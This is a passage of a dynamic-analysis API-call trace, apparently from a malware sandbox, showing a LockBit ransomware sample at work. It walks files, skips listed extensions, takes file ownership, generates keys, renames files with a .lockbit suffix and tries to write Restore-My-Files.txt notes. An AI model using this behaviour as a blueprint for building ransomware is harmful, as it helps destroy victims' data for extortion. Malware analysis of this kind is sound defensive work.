returned -1 [0087.796] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.796] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.797] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.797] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.797] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.797] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.797] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.797] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.797] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.797] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.797] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.797] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.797] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png.lockbit") returned 102 [0087.797] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.798] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.798] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.798] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.799] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.799] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.799] RtlFreeAnsiString (AnsiString="\\") [0087.799] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0087.799] malloc (_Size=0x200) returned 0x77d800 [0087.799] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.799] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.799] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.799] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.800] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.800] CloseHandle (hObject=0x3c0) returned 1 [0087.801] free (_Block=0x77d800) [0087.801] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0087.801] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.801] malloc (_Size=0x40068) returned 0x2031ed0 [0087.802] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=5025) returned 1 [0087.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0087.804] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.804] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.804] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0087.804] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0087.808] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.808] malloc (_Size=0xe2) returned 0x77d800 [0087.808] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xe2, FileInformationClass=0xa) returned 0x0 [0087.808] free (_Block=0x77d800) [0087.808] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.809] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.809] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.809] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6360a8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6360a8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0087.809] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.809] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.809] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0087.809] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.809] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.809] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.810] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.810] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.810] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.810] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.810] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.810] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.810] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.810] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.811] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.811] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.811] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.811] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0087.811] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0087.811] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0087.811] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.811] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.811] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0087.811] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.811] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.811] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png") returned=".png" [0087.812] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.812] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.812] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.812] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.813] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.813] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.813] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.813] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.813] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.813] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.813] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.813] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png.lockbit") returned 108 [0087.813] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.813] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.814] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.814] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.814] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.814] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.814] RtlFreeAnsiString (AnsiString="\\") [0087.814] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c8) returned 0x0 [0087.814] malloc (_Size=0x200) returned 0x77d800 [0087.814] NtQueryInformationToken (in: TokenHandle=0x3c8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.815] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.815] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.815] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.815] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.816] CloseHandle (hObject=0x3c8) returned 1 [0087.816] free (_Block=0x77d800) [0087.816] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c8 [0087.816] CreateIoCompletionPort (FileHandle=0x3c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.816] malloc (_Size=0x40068) returned 0x3e70008 [0087.816] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=3118) returned 1 [0087.816] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0087.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0087.818] ReadFile (in: hFile=0x3c8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0087.827] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.827] malloc (_Size=0xee) returned 0x77d800 [0087.827] NtSetInformationFile (FileHandle=0x3c8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xee, FileInformationClass=0xa) returned 0x0 [0087.827] free (_Block=0x77d800) [0087.827] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion") returned 1 [0087.827] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt") returned 81 [0087.828] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.828] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f65c205, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f65c205, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0087.828] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.828] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.828] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0087.828] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.828] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.828] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.829] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.829] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.829] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.829] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.829] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.829] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.829] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.829] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.830] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.830] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.830] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.830] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0087.830] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0087.830] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0087.830] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.830] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.830] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0087.830] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0087.830] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\") returned="" [0087.830] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png") returned=".png" [0087.830] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.830] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.831] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.831] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.831] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.831] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.832] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.832] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.832] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.832] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.832] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.832] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png.lockbit") returned 99 [0087.832] CreateFileW (lpFileName="C:\\\\Program Files\\DVD 